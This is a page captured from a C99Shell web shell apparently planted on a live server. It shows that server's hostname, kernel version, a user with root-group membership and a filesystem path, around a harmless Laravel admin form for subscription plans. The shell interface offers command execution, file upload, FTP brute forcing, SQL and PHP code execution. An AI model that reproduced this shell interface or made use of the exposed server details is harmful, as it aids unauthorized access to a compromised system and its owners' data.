!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/resources/views/admin/plans/   drwxr-xr-x
Free 29.26 GB of 117.98 GB (24.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     form.blade.php (3.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="title">@lang('admin.form.title')</label>
    <input value="{{isset($plan)?$plan->title:old('title')}}" type="text" name="title" class="form-control" id="title"
           placeholder="@lang('admin.form.input.title')">
</div>

<div class="form-group d-none">
    <label for="limit">@lang('admin.form.sms_limit')</label>
    <input value="{{old('sms_limit')?old('sms_limit'):(isset($plan)?$plan->sms_limit:0)}}" type="number" name="sms_limit" class="form-control" id="sms_limit"
           placeholder="@lang('admin.form.input.enter_sms_limit')">
</div>

<div class="form-group">
    <label for="contact_limit">@lang('admin.form.contact_limit')</label>
    <input value="{{isset($plan)?$plan->contact_limit:old('contact_limit')}}" type="number" name="contact_limit" class="form-control" id="contact_limit"
           placeholder="@lang('admin.form.input.enter_contact_limit')">
</div>

<div class="form-group">
    <label for="contact_limit">@lang('admin.form.device_limit')</label>
    <input value="{{isset($plan)?$plan->device_limit:old('device_limit')}}" type="number" name="device_limit" class="form-control" id="device_limit"
           placeholder="@lang('admin.form.input.enter_device_limit')">
</div>
{{-- 
<div class="form-group d-none">
    <label for="contact_limit">@lang('Whatsapp Device Limit')</label>
    <input value="{{isset($plan)?$plan->wa_device_limit:old('wa_device_limit')}}" type="number" name="wa_device_limit"
    class="form-control" id="wa_device_limit" placeholder="{{trans('Enter Whatsapp Device Limit')}}">
</div> --}}

<div class="form-group">
    <label for="contact_limit">@lang('admin.form.daily_receive_limit')</label>
    <input value="{{isset($plan)?$plan->daily_receive_limit:old('daily_receive_limit')}}" type="number" name="daily_receive_limit" class="form-control" id="daily_receive_limit"
           placeholder="@lang('admin.form.input.enter_daily_receive_limit')">
</div>

<div class="form-group">
    <label for="contact_limit">@lang('admin.form.daily_send_limit')</label>
    <input value="{{isset($plan)?$plan->daily_send_limit:old('daily_send_limit')}}" type="number" name="daily_send_limit" class="form-control" id="daily_send_limit"
           placeholder="@lang('admin.form.input.enter_daily_send_limit')">
</div>

<div class="form-group">
    <label for="price">@lang('admin.form.price')</label>
    <input value="{{isset($plan)?$plan->price:old('price')}}" type="number" name="price" class="form-control" id="price"
           placeholder="@lang('admin.form.input.price')">
</div>

<div class="form-group">
    <label for="recurring_type">@lang('admin.form.recurring_type')</label>
    <select class="form-control" name="recurring_type" id="recurring_type">
        <option {{isset($plan) && $plan->recurring_type=='weekly'?'selected':(old('recurring_type')=='weekly'?'selected':'')}} value="weekly">Weekly</option>
        <option {{isset($plan) && $plan->recurring_type=='monthly'?'selected':(old('recurring_type')=='monthly'?'selected':'')}} value="monthly">Monthly</option>
        <option {{isset($plan) && $plan->recurring_type=='yearly'?'selected':(old('recurring_type')=='yearly'?'selected':'')}} value="yearly">Yearly</option>
    </select>
</div>

<div class="form-group">
    <label for="status">@lang('admin.form.status')</label>
    <select class="form-control" name="status" id="status">
        <option {{isset($plan) && $plan->status=='Active'?'selected':(old('status')=='Active'?'selected':'')}} value="active">Active</option>
        <option {{isset($plan) && $plan->status=='Inactive'?'selected':(old('status')=='Inactive'?'selected':'')}} value="inactive">Inactive</option>
    </select>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--